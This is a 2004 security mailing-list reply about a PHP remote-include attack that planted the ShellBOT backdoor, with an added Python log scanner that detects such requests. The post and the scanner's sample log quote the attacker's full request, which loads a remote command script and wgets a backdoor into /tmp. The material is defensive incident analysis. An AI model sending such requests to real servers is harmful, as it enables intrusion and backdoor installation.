Security Incidents mailing list archives

Re: Systems compromised with ShellBOT perl script - part 2


From: "Chris Norton" <kicktd_list () hotmail com>
Date: Thu, 21 Oct 2004 11:53:08 -0500

This sounds like it may be a typical fopen()/include() PHP exploit, as this
seems to be the motive for this group, as seen from the very first post:

Kirby Angell wrote:

 Yesterday we noticed a funny looking Apache log entry.  It contained:



http://www.DOMAIN.com/index.php?id=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2

Here a remote PHP shell script file is used, then the backdoor is uploaded
onto the server. This can be avoided by setting safe_mode in php.ini to on
and disable_functions to include exec, popen, and passthru.

--
Chris Norton
UAT Student Software Engineering Network Defense
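Added example, not part of the original thread or of either poster's own code: a small Python detector that runs over constructed Apache combined-format access-log entries and flags requests whose query parameters carry an absolute URL, the hook behind the include()/fopen() attack described above, together with any shell command and second-stage download URL riding along in the same request. The first sample request is the one quoted from Kirby Angell's post; the other two lines, and all client addresses and timestamps, are invented for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log (Apache combined format). The first request is the
# one quoted in the thread; the other two are invented, one benign and one
# remote-include probe without a command payload, so both branches run.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Oct/2004:14:02:11 -0500] "GET /index.php?id=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2 HTTP/1.0" 200 512 "-" "Mozilla/4.0"
198.51.100.4 - - [20/Oct/2004:14:03:40 -0500] "GET /index.php?id=news HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [20/Oct/2004:14:05:02 -0500] "GET /index.php?id=http://198.51.100.9/x.txt HTTP/1.1" 200 1200 "-" "libwww-perl/5.79"
"""

# Request line of a combined-format entry: client, timestamp, method, URI, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# A parameter value that is itself an absolute URL: the include()/fopen() hook.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Crude markers of a shell command riding along in a parameter value.
SHELL_RE = re.compile(r'[;|`]|\b(?:wget|curl|fetch|perl|chmod)\b')
# Any URL inside a command string: where the second stage is fetched from.
URL_RE = re.compile(r'(?:https?|ftp)://\S+')


def iter_params(query):
    """Yield (name, value) pairs, decoding each value ourselves so that a
    literal ';' inside a value (cd /tmp;wget ...) is not treated as a
    separator, which older urllib.parse.parse_qsl versions would do."""
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        yield unquote_plus(name), unquote_plus(value)


def analyse_line(line):
    """Return a finding for a request that carries a remote URL in a query
    parameter, or None. A finding records which parameters point off-host,
    any command-like values, and the URLs those commands would fetch."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    query = m.group("uri").partition("?")[2]
    remote, commands, payload_urls = [], [], []
    for name, value in iter_params(query):
        if REMOTE_RE.match(value.strip()):
            remote.append((name, urlsplit(value).hostname))
        if SHELL_RE.search(value):
            commands.append((name, value))
            payload_urls.extend(URL_RE.findall(value))
    if not remote:
        return None
    return {
        "client": m.group("client"),
        "time": m.group("time"),
        "status": m.group("status"),
        "remote": remote,
        "commands": commands,
        "payload_urls": payload_urls,
    }


def scan_log(text):
    """Run analyse_line over every line of an access log and keep the hits."""
    return [f for f in map(analyse_line, text.splitlines()) if f is not None]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['time']} {finding['client']} status={finding['status']}")
        for name, host in finding["remote"]:
            print(f"  param {name!r} includes remote host {host}")
        for name, cmd in finding["commands"]:
            print(f"  param {name!r} carries command: {cmd}")
        for url in finding["payload_urls"]:
            print(f"  second-stage fetched from {url}")
```

The "remote" list is the triage signal (a parameter that should name a local page but names another host), and "payload_urls" gives the drop location to block and to pull for analysis; note that the trailing "?" on the included URL is what lets the attacker swallow whatever suffix the script appends to the parameter. A 200 status on such a request is worth treating as a probable compromise rather than a failed probe.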

